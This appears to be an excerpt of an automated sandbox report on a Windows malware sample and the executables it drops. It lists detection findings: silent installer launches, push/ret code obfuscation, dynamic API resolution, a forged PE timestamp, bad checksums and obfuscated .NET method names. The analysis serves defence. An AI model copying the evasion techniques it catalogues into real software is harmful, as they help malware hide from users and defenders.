Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.4.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.0.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 9.0.Vahutuqeke.exe.f0000.2.unpack, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.4.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 10.0.Kixysyshysy.exe.ef0000.0.unpack, yUGiAdJMfLP4KuadhH/rESWQqorwdVcGanUBW.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)

Obfuscated command line found

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process created: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp "C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp" /SL5="$50038,5808768,66560,C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp "C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp" /SL5="$22016E,506086,422400,C:\Users\user\Desktop\1nJGU59JPU.exe"	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004065C8 push 00406605h; ret	0_2_004065FD
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax	0_2_00408109
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: 0_2_00408F38 push 00408F6Bh; ret	0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004849F4 push 00484B02h; ret	1_2_00484AFA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040995C push 00409999h; ret	1_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00458060 push 00458098h; ret	1_2_00458090
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004860E4 push ecx; mov dword ptr [esp], ecx	1_2_004860E9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004062C4 push ecx; mov dword ptr [esp], eax	1_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004783C8 push ecx; mov dword ptr [esp], edx	1_2_004783C9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004104F0 push ecx; mov dword ptr [esp], edx	1_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00412938 push 0041299Bh; ret	1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0049AD44 pushad ; retf	1_2_0049AD53
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040CE48 push ecx; mov dword ptr [esp], edx	1_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00459378 push 004593BCh; ret	1_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040F3A8 push ecx; mov dword ptr [esp], edx	1_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004434B4 push ecx; mov dword ptr [esp], ecx	1_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0045186C push 0045189Fh; ret	1_2_00451897
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00451A30 push ecx; mov dword ptr [esp], eax	1_2_00451A35
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00495BE4 push ecx; mov dword ptr [esp], ecx	1_2_00495BE9
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00419C38 push ecx; mov dword ptr [esp], ecx	1_2_00419C3D

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Binary contains a suspicious time stamp

Source: 7((_8888YTR(.exe.1.dr

Static PE information: 0xFC527B8E [Sun Feb 24 02:40:14 2104 UTC]

PE file contains an invalid checksum

Source: random.exe.10.dr	Static PE information: real checksum: 0x2b239 should be: 0x290bc
Source: ZHunuhebaqu.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x12c6d
Source: 7((_8888YTR(.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x90de2
Source: Kixysyshysy.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0xa8222
Source: Vahutuqeke.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x92ff1
Source: irecord.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x5d3e9d
Source: 1nJGU59JPU.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x1151b3
Source: 1nJGU59JPU.exe	Static PE information: real checksum: 0x0 should be: 0xc29aa

Source: 7((_8888YTR(.exe.1.dr, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 7((_8888YTR(.exe.1.dr, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 7((_8888YTR(.exe.1.dr, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 7((_8888YTR(.exe.1.dr, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 7((_8888YTR(.exe.1.dr, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 7((_8888YTR(.exe.1.dr, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 7((_8888YTR(.exe.1.dr, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 7((_8888YTR(.exe.1.dr, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 7((_8888YTR(.exe.1.dr, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 7((_8888YTR(.exe.1.dr, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 7((_8888YTR(.exe.1.dr, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 7((_8888YTR(.exe.1.dr, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: Vahutuqeke.exe.3.dr, plU8fE8r7KUM9pQeHO/OqLcIkJX37l65acX24.cs	High entropy of concatenated method names: '.cctor', 'OvVjYCuFAlad7', 'rl8sP6X96L', 'REHsmCchwB', 'LHVsottk80', 'oPTsZklSy7', 'E1Ds9wOk8p', 'fIusO2KbRC', 'moGsry2SfI', 'GUPsM2B7K3'
Source: Vahutuqeke.exe.3.dr, UWlJsCyaOQMxGZ0hwg/DULC6HGii53SXGgQUj.cs	High entropy of concatenated method names: 'otYoQZR1b', 'YhQZj7XnF', 'yrd9qLcIk', 'J37Ol65ac', '.ctor', '.cctor', 'isVhIQO9yZWH4ypLRh', 'Lq4PjLa4a2LF7fS2wX', 'YydUMgc0KPocGGLFAb', 'FXGUEgnWMQYm4ItbTQ'
Source: Vahutuqeke.exe.3.dr, firefox__update__/Form1.cs	High entropy of concatenated method names: '.ctor', 'xVUssvV1E', 'Dispose', 'A5wgvVMUY', 'pKdo8XWGoOsgQjos7d', 'yULQIei1GfkTm2maWe', 'cNHHdqm5PFGEbCj8Dg', 'UqC35KyKRIVVw89Ue2', 'lQbKCvBTMVXpODvGto', 'g06tPbu73i30c9onES'
Source: Vahutuqeke.exe.3.dr, nX0mBKtVA2eUKIDliJ/fXO6EY6gEbWNWKK9Cj.cs	High entropy of concatenated method names: 'BsjsIXkHZp', 'd3lsJiZOOp', 'BqTs8UfEEu', 'VNoseB1j6W', '.ctor', 'kb0SVUKbQhRqDrgnF5Y', 'DNO6lvK2TXdN2NyXOU4', 'sE6V85KQRZ0A0tcIkym', 'pPSaBbK5Y3Ts4OuyjD7', 'vT4m29KziratJFvKokR'
Source: Vahutuqeke.exe.3.dr, ScPfa2xyWrFsaqJBUb/Ma66X2lVGA2LtHmMkT.cs	High entropy of concatenated method names: 'K3HswQYnPA', 'iaRssCiOw6', 'R4csgtNT6I', 'hAtsK5Onjp', 'AJZToq4TEi6FNVTCDiI', 'mANFZ24NxMQBuf1CRNa', 'kJLaPD4ZgLlSmj8OwIe', 'lJfGOc4PDPBmXrvdt4V', 'DlPiNy4qcR9ry5KfpVI', 'JGsheT4glXX1SdwQYT7'
Source: Vahutuqeke.exe.3.dr, q7iTrl3YdW6nh111AJ/ryJmBDfTE3UWCEj4o5.cs	High entropy of concatenated method names: 'YVPsCe6pQX', 'ppSsiLswFg', 'RItsFooHjL', '.ctor', 'KmgJFyK868J0XOJFMRa', 'nBvMbIKd65DEa8YEAPW', 'qmkfE6KssL6PBUyJ8q1', 'Tyjw9XK0wHUj0chxwUq', 'WOC69KK78acDBhKuydH', 'XF6swXK6xbg1NmXR6mb'
Source: Vahutuqeke.exe.3.dr, msdrUqitfIrobRCTeG/UQqLIeCeS5jONLNfOL.cs	High entropy of concatenated method names: 'u9AshMnJUX', 'W7vsugFXH9', 'dhSsGqk6Es', 'GPssyI4S5F', 'KuVsa2JnZ6', 'ULssDjhN8f', '.ctor', 'E7bUxRKDUnqVJYEgOf3', 'E6RVDOKS05s655t21am', 'eB1IvNKMmpCWl9t0jT5'
Source: Vahutuqeke.exe.3.dr, qO3Fdlb2uohPYAG9Qh/jl3wwsHvdEsjDuCKvE.cs	High entropy of concatenated method names: 'xc0sNNEj3H', 'xSdsUM58vD', '.ctor', 'HGKf1a4HyKhHV7g2nUj', 'yctOpJ42714NanmOKpg', 'RssmxF4QuAsFYEH2xJ5', 'VfFxq74bdqvU8Da6VAj', 'DxwdD645jd2qDSAMYRp', 'hQeMJh4zWs4TvIJy11q', 'DhY7PIKXDePQN3eoPdJ'
Source: Vahutuqeke.exe.3.dr, tYQZR1Ib0hQj7XnF8r/pQOsxFqHNBTHMKICJi.cs	High entropy of concatenated method names: 'z89jYCuu8jasr', '.ctor', '.cctor', 'q4Uogt1pEj3ZCLWEeZS', 'R8Xb9l1vkOMSGRjZ2dI', 'numFgg1wI0or70kSLQm', 'XjSp4E1AOo6soUDHREK', 'yOnqJ41jLBXmJfUxNsv', 'XvUKVC1tBug6GM6RPWF', 'RtnEJA1LSi0vFPDrAOg'
Source: Vahutuqeke.exe.3.dr, AMhd1qDj6WMwSuKo68/w6oemTaeIKLar9g4Zc.cs	High entropy of concatenated method names: 'Rr7MKUM9p', 'QeH0OyaK1', 'zS9zLOaQf', '.ctor', 'ji0poc4xGIyOf66sHVW', 'zKxtjd4UU9vGtecGSLQ', 'GJ2Y464rv5jJPaFibsY', 'WfqQ5P4lWvix2ZTMKG1', 'UTpBJU48vqlKKFiHlD7', 'cSGICM4dDyNd5f9mUuw'
Source: Vahutuqeke.exe.3.dr, rkahhccbyGtRtxNhFB/Wu2Xn0FhsPa3wAlKsu.cs	High entropy of concatenated method names: 'flhslprA99', 'LeXsxPpEbx', 'cj0sHO9JrN', 'S5CsbRtxCp', '.ctor', 'CFiXmTKJY2wvERBcMPX', 'U6KJfdKFwdPQD1HSRpN', 'SklDcrKElSeN1yLGLbM', 'sxLgRsKfJ7W8TURXxPQ', 'pRYHb7KkfIEm4xvMaTL'
Source: Vahutuqeke.exe.3.dr, SjTQM5UEH09TZvCBNQ/xeocNANdcCHOgP7OWh.cs	High entropy of concatenated method names: 'Uodu8eocN', 'LdcGCHOgP', 'X5EaH09TZ', 'MCBDNQY1Q', 'LDwxUDTfk', 'M7dHRGEt5', 'eLCC6Hii5', 'rSXiGgQUj', 'QMxcGZ0hw', 'cJ6foemTe'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, SmURG3nxcv5NsIgLlR/K8qP7bUpuJKKQA17dc.cs	High entropy of concatenated method names: 'sLHwLZGAv', 'RiNAHqWce', 'zpCz7hibr', 'aoROIjOq4I', 'Kb2OOt7QFW', 'JR4O0ujgaT', 'YsFOsVZ5Wb', 'DWkOm1m4tA', 'Lh4O59VOF0', 'kHqOQUvaK2'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, gN16lDiQ689Jf9LG4Z/T8FSJJmk2Z6GIYPFJG.cs	High entropy of concatenated method names: 'etHBl9Ir8', 'GPlEIyGT4', '.ctor', '.cctor', 'qyZyV4bcbebFYJcVTTR', 'oXhrskbdmFqbTOyp0Zp', 'XnhF1sb7HdkKIO6eMpH', 'bODi3yb6JgSvgBF8JQK', 'IRcPHybyCZ9RXhqwoNg', 'IRDWnDbqc9oK7xjo4Ue'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HwdMKZof3vOIIGmERY/HgvKc9CgA75M7Y0PoO.cs	High entropy of concatenated method names: 'OH3gQ5iBW', 'm9dS8uhTC', '.ctor', '.cctor', 'tBZekyKaCsOO2JkEKau', 'XZn5J8KXXkIPmdptt68', 'LbPHDRKVNUselApRSA2', 'uhjH2yKDmm1JWBUECPd', 'hHM9QlKIy21L1QCJqZj', 'X9mAvuKrfROuo4TTNtB'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, AeVuKYEtvG9d2lXKA2/eo3OKKXquNmJJs2HKd.cs	High entropy of concatenated method names: 'FWuOve0WF3', 'H9CO79riro', '.ctor', 'Jl1a7sj4wMR89tCQ7te', 'MyEDCYjssunvrS0aQYn', 'BCea91jHqS1IQyCK28w', 'Ht5po2jClyoHjEntS2N', 'Ih20HSjYl3oWbqOxyv0', 'ogTyDQjgWqGrVAh9Lyr', 'iN8UIGjfP01vZkXBVVE'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, miAKWZFBVVPloEdanP/BHc01NZ2GMifUsemcX.cs	High entropy of concatenated method names: 'FOfjMQVVVgL68', '.ctor', '.cctor', 'EHgpQetbGpjmJy0senT', 'OZlaXvtKwUZFRcsatFZ', 'xeYFN1tjpbhnhQV949J', 'gvBePgtRR6iiqbpYN3D', 'Uk7sBktSruO9rwHcRVq', 'Pyj2Idtu5l4EKOrpUqh', 'FVYlARtwK44wjvLWpK9'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, fnMUgUcy3ZcX8C8Pq9/e4s2r9hn6NEi0rdfvu.cs	High entropy of concatenated method names: 'JUFxSMjkg', 'ie1tKCI0P', 'uTLbVmrka', 'GhKG0EHiw', 'p9jFohc9m', '.ctor', 'ixhQn2KEgUifv9sk5kW', 'MdrjOyKZTImBgcy1P44', 'TFsr2AKGKL3sZDTyluT', 'ao7wk8KN3x4WRNhDUMF'
Source: 3.0.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, HcZNbdxnfghYO7uUSK/PoE7jhP0D5vFVdJIU2.cs	High entropy of concatenated method names: '.cctor', 'Ug8jMQVCcVfeP', 'Wee07uFdgE', 'dZX0VwEM6e', 'GRs0qR8MkS', 'c7n0pquH0x', 'Mxb0UYZ5S7', 'N8p0Kyv9pk', 'cSo0fFS87m', 'zZM0C5fTMe'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, XtlPs98sOmK1m3k4ha/tXuj4D0aklpRB6u0tk.cs	High entropy of concatenated method names: '.ctor', 'Wi6hkN294', 'Hl884w5ry', 'HexNm01MA', 'qtE63xjoh', 'mw1epkKDO', 'Jw99HHjA8', 'lTsJLeWnV', 'ykd2rMGeo', 'kvnn6SwZC'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/Form1.cs	High entropy of concatenated method names: '.ctor', 'VgSONyEas', 'bZA0Wkpps', 'Kx3sHMlUX', 'Dispose', 'iS8mdfsCL', 'SHDdSytPVd3rTfqX3S', 'aeE8bMaBEEyILAdX5V', 'Wimj1JRfE3YigiqsM6', 'WKs1yESdsZUwML6a8O'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, IdownLoad_PID__k66qq79b5ppkju5j/tx9tqnh972krjuv3.cs	High entropy of concatenated method names: '.ctor', 'QfKqD67Jp', 'Dispose', 'ERJpNNWwV', 'qiXF67y8bVAsMoFbSp', 'FEtNy4qxYpfeOkrhih', 'bfWWdv7lphU3NcFhsK', 'M2ZZQh6AS30yc6Kc1F', 'hbvFia8aOpEyEHq1RX', 'pFMCipoYyPykQE30oW'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, aJLGwOK7a6Y6CuBWig/zDmGLPfHHJ32a4vUWt.cs	High entropy of concatenated method names: 'oCw4iK6RZ', 'Sany6OX8R', 'jNccPabM7', 'FFQZWdr38', 'QtqTgGMwr', 'vjGdPEpsH', 'RpWRrFRm7', '.ctor', 'famm0UK8gfPZOZdK25E', 'xP7OUmKoEUfQ48QVPTK'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, G6USddggYiiNxC2CPU/ypso64N9O5RRFvmJfg.cs	High entropy of concatenated method names: 'DilOaJfitT', '.ctor', 'apLZpTRXeYH3P23f8Rn', 'JLJMiVRVQoXv2mo1Vxl', 'uyyFKdRDvCC4nBP5Efg', 'yuaimbRIfZYppVulDRR', 'myOaIrRrqSGfdOgUces', 'F7DhgHR04YWlL2A1uu4', 'QjyG3PRL2qRsUekyxF8', 'xf8CHtRirapcCPHclXH'
Source: 3.2.7((_8888YTR(.exe.600000.0.unpack, p4DUMXYTOkvQsVWn0i/Yl3j7WWms1XqTH3tLI.cs	High entropy of concatenated method names: '.ctor', 'ylx1LqXdy', '.cctor', 'vgiOUlb23uhS1xt2UJF', 'Jdb6dUbAuht4j8kMmQj', 'oaX44YbmcJ4inJJ60WQ', 'ByHjerbUpd0kJroqxFS', 'Pv22IJbOEalCaCoNR1C', 'KFlkwEbeneLP3SxZPmy', 'OT0p86bn467BOVB7Ir3'
